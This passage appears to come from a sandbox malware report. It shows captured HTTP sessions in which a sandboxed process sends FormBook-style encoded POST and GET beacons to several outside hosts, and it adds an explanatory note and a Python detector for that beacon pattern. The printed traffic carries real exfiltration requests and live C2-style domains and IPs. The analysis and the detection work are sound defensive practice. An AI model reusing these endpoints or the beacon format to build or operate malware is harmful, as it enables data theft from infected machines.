                                  Data Raw: 46 4e 50 64 3d 45 42 41 39 67 51 71 58 75 47 4d 64 53 4b 43 5a 34 74 6f 64 37 35 52 45 6b 79 2f 35 4b 76 65 6f 51 33 76 76 68 78 76 42 6e 63 34 37 54 52 4b 52 47 44 71 79 4c 78 50 43 4d 55 4a 4d 45 4a 79 59 7a 67 39 6d 57 30 48 6b 58 6f 43 31 6e 69 59 68 78 43 49 4b 48 4d 5a 4d 62 74 2b 68 44 48 74 7a 4d 47 37 57 77 34 52 56 71 58 68 50 6a 31 4f 35 6d 32 2b 34 67 52 6c 71 30 73 70 72 70 65 67 56 65 50 42 54 33 34 51 74 69 73 46 44 41 36 2f 46 55 46 48 31 5a 6f 6d 6d 79 73 53 57 45 42 41 52 47 4f 47 37 69 4a 6c 6d 68 65 56 44 4c 6b 6c 52 2f 41 35 52 70 31 6b 66 70 6b 56 70 48 69 48 6b 71 37 77 4e 4c 39 69 34 79 57 63 4a 35 58 5a 4a 58 73 6e 70 66 35 37 49 7a 63 79 35 6f 63 58 47 64 68 2f 57 2f 47 55 62 4d 6a 35 35 4d 72 5a 50 49 66 4a 48 6b 77 2b 35 36 48 61 6d 68 34 33 56 76 48 42 66 79 55 4a 68 57 61 5a 37 32 74 58 71 48 2b 53 67 62 76 46 43 31 5a 50 6c 37 74 2b 38 62 6e 34 6a 6f 35 62 4a 67 66 39 4b 63 6c 59 37 71 4c 4b 4a 78 76 68 48 43 2f 34 4c 48 4e 63 72 76 6e 33 44 74 57 31 50 6b 63 50 59 46 [TRUNCATED]
                                  Data Ascii: FNPd=... [TRUNCATED]


                                  Session ID: 28 | Source: 192.168.2.6:49734 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:37.057490110 CEST | Bytes transferred: 493 | Direction: OUT
                                  GET /nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Timestamp: May 23, 2024 15:20:37.767565966 CEST | Bytes transferred: 418 | Direction: IN
                                  HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:20:37 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 4a 44 6f 64 6a 6c 57 6b 6b 30 6c 63 4e 63 54 39 7a 4d 30 53 32 34 46 6c 73 51 53 2f 65 4d 71 61 63 51 54 56 75 43 4c 37 6a 2b 55 6e 53 58 66 54 4f 56 37 78 4e 6b 2f 55 44 69 4a 71 4c 34 43 51 39 77 77 70 45 69 72 68 49 63 62 38 6a 77 59 41 37 42 6f 32 48 76 5a 51 4e 74 54 43 4c 43 45 4e 43 46 33 62 36 35 6f 46 32 51 78 6e 6f 6c 4f 36 69 56 57 74 71 77 56 6f 70 74 35 51 71 76 30 46 59 4d 4a 2f 32 65 38 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>
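
The sessions above all come from the same PID and repeat one shape per host: a run of form-urlencoded POSTs to a short path (bodies of 209, 233 and 1245 bytes, all starting with the key FNPd=), then a GET to the same path whose query carries FNPd= plus a second parameter, zdK0d=M8mTZ0xHNd1dPVm, that does not change across www.anoldshow.top, www.badcopsinyourtown.info, www.autonomyai.xyz and www.brzuszkiewicz.pl. Every request uses the same IE11-style User-Agent with Connection: close, and every POST sets Origin and Referer to the very path it posts to, which the sample never fetched with a GET first. The following detector is an added example, not code from the Joe Sandbox report or from the sample: it parses raw HTTP/1.1 request text, keeps requests with that shape, and flags hosts that share one form key, returning the cross-host constant as a pivot. The helper _req and the benign www.example.com control request are constructed for the example; the hosts, paths, query strings and POST bodies in SAMPLE_REQUESTS are copied from the sessions above (the 1245-byte POSTs are truncated in the report and are left out).

```python
"""Detect the FormBook-style beacon shape seen in the sandbox sessions from raw requests.
Added example, not part of the Joe Sandbox report and not the malware's own code."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent string every captured request in the report carries (IE11-style).
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
# Beacon values are base64-like: '+' and '/' unescaped, optional '=' padding, no percent-encoding.
B64ISH = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def split_form(data):
    """Split k=v&k2=v2 without percent-decoding; parse_qsl would turn base64 '+' into spaces."""
    return [tuple(pair.partition("=")[::2]) for pair in data.split("&") if pair]


def beacon_fields(req):
    """Return (host, path, params) when a request has the beacon shape, else None."""
    h = req["headers"]
    if h.get("user-agent") != IE11_UA or h.get("connection") != "close":
        return None
    host, parts = h.get("host", ""), urlsplit(req["target"])
    if req["method"] == "POST":
        # Form POST whose Referer points back at the beacon path itself (never fetched by GET).
        if h.get("content-type") != "application/x-www-form-urlencoded":
            return None
        if h.get("referer") != f"http://{host}{parts.path}":
            return None
        params = split_form(req["body"])
    elif req["method"] == "GET":
        params = split_form(parts.query)
    else:
        return None
    if not params or not all(B64ISH.match(v) for _, v in params):
        return None
    return host, parts.path, params


def detect_formbook_beacons(raw_requests):
    """Group beacon-shaped requests per host. A form key reused across two or more hosts marks
    those hosts; GET parameters whose value recurs across hosts are returned as pivots."""
    per_host, hosts_by_key, hosts_by_const = defaultdict(list), defaultdict(set), defaultdict(set)
    for raw in raw_requests:
        req = parse_http_request(raw)
        fields = beacon_fields(req)
        if fields is None:
            continue
        host, path, params = fields
        per_host[host].append((req["method"], path))
        hosts_by_key[params[0][0]].add(host)
        if req["method"] == "GET":
            for key, value in params[1:]:
                hosts_by_const[f"{key}={value}"].add(host)
    findings = {}
    for key, hosts in hosts_by_key.items():
        if len(hosts) < 2:  # one host with an odd-looking key is not enough on its own
            continue
        for host in hosts:
            findings[host] = {"form_key": key,
                              "paths": sorted({p for _, p in per_host[host]}),
                              "sequence": [m for m, _ in per_host[host]]}
    pivots = {const: sorted(hosts) for const, hosts in hosts_by_const.items() if len(hosts) >= 2}
    return findings, pivots


def _req(method, host, target, body=None):
    """Build raw request text in the shape of the captured sessions (constructed helper)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Connection: close", f"User-Agent: {IE11_UA}"]
    if body is not None:
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}",
                  f"Origin: http://{host}", f"Referer: http://{host}{target}"]
    return "\n".join(lines) + "\n\n" + (body or "")


# Constructed sample: hosts, targets and bodies copied from the report's sessions, plus one
# benign request (www.example.com, Chrome UA) as a negative control.
SAMPLE_REQUESTS = [
    _req("GET", "www.anoldshow.top", "/ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm"),
    _req("POST", "www.badcopsinyourtown.info", "/vucc/", "FNPd=hrhsBV1iy8Jt1KsC3S1vEbFrltRnv0mw8ZrA48rA+ZxEpoUrt21qxHgqguz2I9tdbtZPskLraQM5Wdk+5VwQfQ5Ak4nAhBBo06R6zCsqDzwGFdCgCQkKWx2wKwROv9ZiR2oIZsLxyb9OtnWpsrZ65gD9hf5c3xUJXEEH5ZTVSeSvd752MJXLCWuqrUJ+pwcQd1s+qtYDpBUO"),
    _req("POST", "www.badcopsinyourtown.info", "/vucc/", "FNPd=hrhsBV1iy8Jt0rcCkFJvC7FqqNRn2km08Z3A45KF+tdEqMcr/kdqwHgq0+yyM9tgbtEwskHraRo5WYY+5itGfA5CwInClBBo06R6zCpBD1YGFNygFBkJbR2zdARO9NZmR2omZtHPyZFOtnGpt6Z93gDBu/4p7AhHSFBIxZPXRJqHYN4sQ6XoQGOorWRMpQc6f1U+46Ukm1xtHt/1qYEAbC0Rc03KTDwb2g=="),
    _req("GET", "www.badcopsinyourtown.info", "/vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm"),
    _req("POST", "www.autonomyai.xyz", "/nvvv/", "FNPd=EBA9gQqXuGMdTvKZ+OAd8ZRHhy/5R/ekQ3rvhwbRkuU7SHWRFl+yJxPCKUJQbZyOzkVbW13eXqu1mF8h5ggJIcZ0ft+gDHs7MCedw4UdqXZPgHm5x2+78Blq0spnpehwePYW35Y9jedDO7fFHW/2O4mi6MTOJDZlM/y2irh5x+85MVpn7gdJgm8H3V0/f2PppocXa7m96BV0"),
    _req("GET", "www.autonomyai.xyz", "/nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm"),
    _req("POST", "www.brzuszkiewicz.pl", "/xf32/", "FNPd=P3OHUaXsuFb52g/xCVHkR/gslb8QoVtJsDwi1m9MtUVXd8rhm2UzjqNSQ3VClxAD03ZiF68KC0qAS/K+AhxCTDOf8YC1Z8ML3pegS0f7dKUI7naIgnt4mHnA/PNgexNQR90gk8B+dIqtY8dPjdL1ojr9dDiFpj+TWilZl2WRRGnnHnIeZaPwoxUcVABgAPIAmcGKzrgLyVTD"),
    "GET /index.html HTTP/1.1\nHost: www.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) Chrome/124.0\nConnection: keep-alive\n\n",
]

if __name__ == "__main__":
    flagged, pivots = detect_formbook_beacons(SAMPLE_REQUESTS)
    print(sorted(flagged), pivots)
```

The detector deliberately keys on the request shape rather than on the hosts: in this capture the servers answer with generic 404 and 403 pages or a JavaScript redirect to /lander, so several of these hosts may be decoys or unrelated sites and should not be treated as confirmed C2 on their own. The form key and the constant second GET parameter, by contrast, stay fixed across hosts for this sample and are the values to pivot on in proxy logs.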


                                  Session ID: 29 | Source: 192.168.2.6:49735 | Destination: 185.253.212.22:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:42.874552011 CEST | Bytes transferred: 754 | Direction: OUT
                                  POST /xf32/ HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.brzuszkiewicz.pl
                                  Referer: http://www.brzuszkiewicz.pl/xf32/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 50 33 4f 48 55 61 58 73 75 46 62 35 32 67 2f 78 43 56 48 6b 52 2f 67 73 6c 62 38 51 6f 56 74 4a 73 44 77 69 31 6d 39 4d 74 55 56 58 64 38 72 68 6d 32 55 7a 6a 71 4e 53 51 33 56 43 6c 78 41 44 30 33 5a 69 46 36 38 4b 43 30 71 41 53 2f 4b 2b 41 68 78 43 54 44 4f 66 38 59 43 31 5a 38 4d 4c 33 70 65 67 53 30 66 37 64 4b 55 49 37 6e 61 49 67 6e 74 34 6d 48 6e 41 2f 50 4e 67 65 78 4e 51 52 39 30 67 6b 38 42 2b 64 49 71 74 59 38 64 50 6a 64 4c 31 6f 6a 72 39 64 44 69 46 70 6a 2b 54 57 69 6c 5a 6c 32 57 52 52 47 6e 6e 48 6e 49 65 5a 61 50 77 6f 78 55 63 56 41 42 67 41 50 49 41 6d 63 47 4b 7a 72 67 4c 79 56 54 44
                                  Data Ascii: FNPd=P3OHUaXsuFb52g/xCVHkR/gslb8QoVtJsDwi1m9MtUVXd8rhm2UzjqNSQ3VClxAD03ZiF68KC0qAS/K+AhxCTDOf8YC1Z8ML3pegS0f7dKUI7naIgnt4mHnA/PNgexNQR90gk8B+dIqtY8dPjdL1ojr9dDiFpj+TWilZl2WRRGnnHnIeZaPwoxUcVABgAPIAmcGKzrgLyVTD
                                  Timestamp: May 23, 2024 15:20:43.549030066 CEST | Bytes transferred: 289 | Direction: IN
                                  HTTP/1.1 403 Forbidden
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:43 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Session ID: 30 | Source: 192.168.2.6:49736 | Destination: 185.253.212.22:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:45.419533968 CEST | Bytes transferred: 778 | Direction: OUT
                                  POST /xf32/ HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.brzuszkiewicz.pl
                                  Referer: http://www.brzuszkiewicz.pl/xf32/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 50 33 4f 48 55 61 58 73 75 46 62 35 32 41 50 78 45 79 54 6b 54 66 67 76 37 4c 38 51 69 31 74 33 73 45 34 69 31 6d 55 58 74 47 78 58 64 63 37 68 6e 33 55 7a 69 71 4e 53 49 48 55 4a 71 52 41 4d 30 33 56 41 46 37 73 4b 43 30 57 41 53 2b 36 2b 44 57 6c 42 42 6a 4f 64 77 34 44 7a 57 63 4d 4c 33 70 65 67 53 30 4b 51 64 4b 38 49 37 58 4b 49 6d 43 5a 2f 6c 48 6e 48 70 66 4e 67 55 52 4e 55 52 39 30 43 6b 38 78 48 64 4f 6d 74 59 38 4e 50 6b 50 76 79 68 6a 71 30 5a 44 6a 4d 68 69 48 78 4d 52 49 6a 72 56 6a 7a 41 55 6e 37 47 52 4a 45 46 70 50 54 36 68 30 65 56 43 5a 53 41 76 49 71 6b 63 2b 4b 68 38 73 73 39 68 32 67 6b 4b 4a 57 58 38 69 6c 2b 74 59 35 30 41 69 31 6d 56 58 52 4a 41 3d 3d
                                  Data Ascii: FNPd=P3OHUaXsuFb52APxEyTkTfgv7L8Qi1t3sE4i1mUXtGxXdc7hn3UziqNSIHUJqRAM03VAF7sKC0WAS+6+DWlBBjOdw4DzWcML3pegS0KQdK8I7XKImCZ/lHnHpfNgURNUR90Ck8xHdOmtY8NPkPvyhjq0ZDjMhiHxMRIjrVjzAUn7GRJEFpPT6h0eVCZSAvIqkc+Kh8ss9h2gkKJWX8il+tY50Ai1mVXRJA==
                                  Timestamp: May 23, 2024 15:20:46.074805975 CEST | Bytes transferred: 289 | Direction: IN
                                  HTTP/1.1 403 Forbidden
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:45 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Session ID: 31 | Source: 192.168.2.6:49737 | Destination: 185.253.212.22:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:47.945456028 CEST | Bytes transferred: 1791 | Direction: OUT
                                  POST /xf32/ HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.brzuszkiewicz.pl
                                  Referer: http://www.brzuszkiewicz.pl/xf32/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:20:48.639616013 CEST | 289 | IN | HTTP/1.1 403 Forbidden
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  32 | 192.168.2.6 | 49738 | 185.253.212.22 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:20:50.479813099 CEST | 495 | OUT | GET /xf32/?FNPd=C1mnXsnvmQ2srgCAP1LYR8UCiu5rr29LvVkLxlUVxlF6UozvjyxPjaNreXZ1i0YG7AgmeP0abVbXfNSSITNtMXyNs4HZedQg/L+kUEn9BLsW+ROjsB5HlVbKq/g7YxphTM4QsIM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.brzuszkiewicz.pl
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:20:51.161376953 CEST | 496 | IN | HTTP/1.1 302 Found
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:20:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: PHPSESSID=9b9dac8365dca5c281b13f492d792d16; path=/; HttpOnly
                                  Set-Cookie: locale=en_US; expires=Sun, 21-May-2034 13:20:51 GMT; Max-Age=315360000; path=/
                                  Location: https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_redirect&type=listing&id=3940392&medium=direct:direct
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  33 | 192.168.2.6 | 49739 | 87.236.16.214 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:01.493554115 CEST | 754 | OUT | POST /pczf/ HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.novosti-dubai.ru
                                  Referer: http://www.novosti-dubai.ru/pczf/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=itJov2veHmLEAbTs2DWXPynPEc4nfqcw/d7tiNfLBTmWNne2vtBTH/Azwr1tHlr0dwt8E335fmMxD/LBXUKUXWczhmLJ6BhnawnEfwsMRJ58F75mOOBLRb2Yy0eJzHnspLk0iydGeCzEhJBUi6Yv3WMPWCbDnIXxfdA+Wl6BOfcqPBC00HibJzDcoAYFSMo2Y1VyPoC2JPoT
                                  May 23, 2024 15:21:02.944266081 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  34 | 192.168.2.6 | 49740 | 87.236.16.214 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:04.025677919 CEST | 778 | OUT | POST /pczf/ HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.novosti-dubai.ru
                                  Referer: http://www.novosti-dubai.ru/pczf/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=itJov2veHmLEB+bs0guXISnML84nUKc0/dntiPyMBFWWDnu29otTUPAzk71kKFr9dwocE3L5fnoxD+7BXnSXF2cxsGLL1hhnawnEfw4mRJh8ELpmPvBIc72Z7UeJ3HnopLlZizRoeA7EhIxUsIgu5mMJbiakpaGeZOdEYmWXdssMO3Duo0i4bjjeoCA3Ssoca1tyd/ORG7Nw7KCx6TEeope4BRr1VcCWZQ==
                                  May 23, 2024 15:21:05.146579981 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:04 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  35 | 192.168.2.6 | 49741 | 87.236.16.214 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:06.563597918 CEST | 1791 | OUT | POST /pczf/ HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.novosti-dubai.ru
                                  Referer: http://www.novosti-dubai.ru/pczf/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:07.644262075 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  36 | 192.168.2.6 | 49742 | 87.236.16.214 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:09.103352070 CEST | 495 | OUT | GET /pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
